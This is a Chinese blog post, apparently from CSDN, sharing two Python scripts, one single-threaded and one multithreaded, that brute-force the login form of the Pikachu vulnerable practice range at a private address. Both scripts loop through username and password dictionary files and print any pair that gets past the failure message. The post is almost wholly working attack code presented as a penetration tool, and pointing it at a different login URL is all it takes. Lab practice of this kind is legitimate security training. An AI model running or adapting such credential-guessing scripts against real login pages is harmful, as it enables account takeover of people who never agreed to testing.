渗透工具----暴破脚本

最新推荐文章于 2024-05-09 21:07:40 发布

Blchain

最新推荐文章于 2024-05-09 21:07:40 发布

阅读量178

点赞数

分类专栏：工具编写文章标签：安全 Powered by 金山文档

本文链接：https://blog.csdn.net/wyzhxhn/article/details/129358195

版权

工具编写专栏收录该内容

1 篇文章 0 订阅

订阅专栏

功能：实现pikachu靶场爆破试验

基础暴破

import requests
from bs4 import BeautifulSoup
import time
def request_url(name,password):
    url='http://192.168.186.135/pikachu/vul/burteforce/bf_form.php'
    headers={
        "Connection":"keep-alive",
        "Content-Type":"application/x-www-form-urlencoded",
        "Cookie":"PHPSESSID=79blo8vag0ce1vu66hi930e3d7",
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
    }
    data={
        "username":f'{name}',
        "password":f'{password}',
        "submit":"Login"
    }
    xiangying = requests.post(url, data, headers=headers)
    return data,xiangying

def pipei(yuanma,data):
    # 创建BeautifulSoup对象
    bs = BeautifulSoup(yuanma.text, 'html.parser')
    # 获取登录成功或失败的标识性字符
    labble = bs.find_all('p')
    for i in labble:
        labble_str = i.text.strip()
        if labble_str != 'username or password is not exists～':
            print(f'{labble_str},username:{data["username"]},password:{data["password"]}')

# 传入用户名和密码字典
time1=time.time()
with open('C:\\Users\bigboss\Desktop\数据保存.txt','r+') as username_f:
    while True:
        username=username_f.readline().strip()
        with open('C:\\Users\bigboss\Desktop\密码.txt','r+') as password_f:
            while True:
                password=password_f.readline().strip()
                if not password:
                    break
                data,response=request_url(username, password)
                # print(data)
                pipei(response, data)
        if not username:
            break
time2=time.time()
print(time2-time1)

多线程

import requests
from bs4 import BeautifulSoup
from threading import Thread
from queue import Queue
import time
def request_url(name,password):
    global c
    url='http://192.168.186.135/pikachu/vul/burteforce/bf_form.php'
    headers={
        "Connection":"keep-alive",
        "Content-Type":"application/x-www-form-urlencoded",
        "Cookie":"PHPSESSID=79blo8vag0ce1vu66hi930e3d7",
        "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0"
    }
    data={
        "username":f'{name}',
        "password":f'{password}',
        "submit":"Login"
    }
    c.put((url,headers,data))

def pipei(yuanma,data):
    # 创建BeautifulSoup对象
    bs = BeautifulSoup(yuanma.text, 'html.parser')
    # 获取登录成功或失败的标识性字符
    labble = bs.find_all('p')
    for i in labble:
        labble_str = i.text.strip()
        if labble_str != 'username or password is not exists～':
            print(f'{labble_str},username:{data["username"]},password:{data["password"]}')
def qu():
    global c
    while True:
        pack=c.get()
        xiangying=requests.post(url=pack[0],headers=pack[1],data=pack[2])
        pipei(xiangying,pack[2])
        c.task_done()

# 变成多线程
c = Queue()
#
# request_url('123','123')
# qu()


# 传入用户名和密码字典
time1=time.time()
with open('C:\\Users\TangL\Desktop\数据保存.txt','r+') as username_f:
    while True:
        username=username_f.readline().strip()
        with open('C:\\Users\TangL\Desktop\密码.txt','r+') as password_f:
            while True:
                password=password_f.readline().strip()
                if not password:
                    break
                job1 = Thread(target=request_url, args=(username, password),daemon=True)
                job1.start()
        if not username:
            break
work=[]
for i in range(0,10):
    job2=Thread(target=qu,daemon=True)
    work.append(job2)
for j in work:
    j.start()
# print(data)
c.join()
time2=time.time()
print(time2-time1)